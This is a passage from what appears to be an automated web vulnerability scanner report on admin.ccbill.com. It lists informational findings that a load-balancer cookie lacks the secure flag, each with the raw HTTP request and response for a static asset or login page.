7.33. https://admin.ccbill.com/images/ccb_SupportBarRight.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_SupportBarRight.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_SupportBarRight.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebc5-310-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 784
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a..c....................................................................................................!.......,......c.....2h.......1.u\.! A0-<....h0P@X......v..o
..8.D..; 2...G.%.........h.
!
...[SNIP]...

7.34. https://admin.ccbill.com/images/ccb_System5Banner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_System5Banner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_System5Banner.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebc6-9df-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 2527
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a..,........GS......Qp)j..6........S.u..K~.8s.!Z./j.+e.................B.3n.h......k..Z..J.-n.Rl.2p..........'_.+j.hz....)e.....V............................<\t..................................
...[SNIP]...

7.35. https://admin.ccbill.com/images/ccb_System5Bkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_System5Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_System5Bkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680fb3-6ad-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1709
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

7.36. https://admin.ccbill.com/js/AC_RunActiveContent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/js/AC_RunActiveContent.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/AC_RunActiveContent.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 23 Oct 2010 00:04:43 GMT
ETag: "1690841-22de-4933d81929cc0"
Accept-Ranges: bytes
Content-Length: 8926
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

//v1.7
// Flash Player Version Detection
// Detect Client Browser type
// Copyright 2005-2007 Adobe Systems Incorporated. All rights reserved.
var isIE = (navigator.appVersion.indexOf("MSIE") != -1)
...[SNIP]...

7.37. https://admin.ccbill.com/js/liveChat.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/js/liveChat.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/liveChat.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 09 Apr 2011 00:20:36 GMT
ETag: "d92d0-26a-4a0714fb73d00"
Accept-Ranges: bytes
Content-Length: 618
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

(function() {
var lc_params = '';
var lc_lang = 'en';
var lc_skill = '0';

var lc = document.createElement('script'); lc.type = 'text/javascript'; lc.async = true;
var lc_src = ('
...[SNIP]...

7.38. https://admin.ccbill.com/js/loginJSTools.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/js/loginJSTools.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/loginJSTools.js?17 HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 23 Oct 2010 00:04:46 GMT
ETag: "169041c-c9a-4933d81c06380"
Accept-Ranges: bytes
Content-Length: 3226
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
// File: loginJSTools.js - collection of utility functions for newSkin login page
// Author: Michael S.
// Date: 2/20/2009
*/

// hook function to call functions on page load
function initPage() {
...[SNIP]...

7.39. https://admin.ccbill.com/login.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/login.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.cgi HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 302 Found
Date: Tue, 12 Jul 2011 17:14:53 GMT
Location: loginMM.cgi
Content-Length: 195
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="loginMM.cgi">here</a>.</p>
</body></html>

7.40. https://admin.ccbill.com/loginIndex.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/loginIndex.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loginIndex.cgi HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

7.41. https://admin.ccbill.com/loginMM.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/loginMM.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loginMM.cgi HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

7.42. https://admin.ccbill.com/style/css/ccbill_style.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/css/ccbill_style.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/ccbill_style.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 23 Oct 2010 00:05:00 GMT
ETag: "421253-677-4933d82960300"
Accept-Ranges: bytes
Content-Length: 1655
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*Header Styles*/
a.links {
color: black !important;
text-decoration: none !important;
font-family: Verdana !important;
font-size: 10px !important;
}

a.links:hover {
text-decorati
...[SNIP]...

7.43. https://admin.ccbill.com/style/css/default_style.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/css/default_style.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/default_style.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Fri, 05 Mar 2010 22:45:42 GMT
ETag: "4208d8-3347-4811579a51180"
Accept-Ranges: bytes
Content-Length: 13127
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/* CSS Document */

html {
overflow: auto;
}

body { font-family: Verdana; font-size: 11px; line-height: normal;}
a {font-size: 11px; font-family: Verdana, Arial, Helvetica, sans-serif; co
...[SNIP]...

7.44. https://admin.ccbill.com/style/css/images/text-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/css/images/text-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/images/text-bg.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

7.45. https://admin.ccbill.com/style/css/password.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/css/password.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/password.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:00 GMT
Last-Modified: Thu, 20 Aug 2009 00:01:36 GMT
ETag: "58035b-1050-4718774815800"
Accept-Ranges: bytes
Content-Length: 4176
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

body { font-family: Verdana; font-size: 11px; }
a {font-size: 11px; font-family: Verdana, Arial, Helvetica, sans-serif; color: #1563A2; text-decoration: underline; }

.inputLostPass {
font-fa
...[SNIP]...

7.46. https://admin.ccbill.com/style/images/bg_img.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/bg_img.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/bg_img.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:02 GMT
Last-Modified: Mon, 20 Jul 2009 22:43:51 GMT
ETag: "580394-31d-46f2adf35d7c0"
Accept-Ranges: bytes
Content-Length: 797
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....H.H.....C........... ... .......

.

........................... ...C.............. ......F...................................
...[SNIP]...

7.47. https://admin.ccbill.com/style/images/ccbillLogo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/ccbillLogo.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/ccbillLogo.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:00 GMT
Last-Modified: Sat, 23 Oct 2010 00:05:04 GMT
ETag: "1679555-171c-4933d82d30c00"
Accept-Ranges: bytes
Content-Length: 5916
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....H.H.....C...........
...
. .. ........................""""""""""...C.............. ! !!! !!!!!!!!"""""""""""""""......F...................................
...[SNIP]...

7.48. https://admin.ccbill.com/style/images/contactCCBillBtn.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/contactCCBillBtn.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/contactCCBillBtn.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 29 Jul 2009 00:07:17 GMT
ETag: "1679087-913-46fccf8525740"
Accept-Ranges: bytes
Content-Length: 2323
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR..............M......sBIT.....O.... pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....tEXtXML:com.adobe.xmp.<?xpacket begin=" " id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmln
...[SNIP]...

7.49. https://admin.ccbill.com/style/images/email_icon.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/email_icon.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/email_icon.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
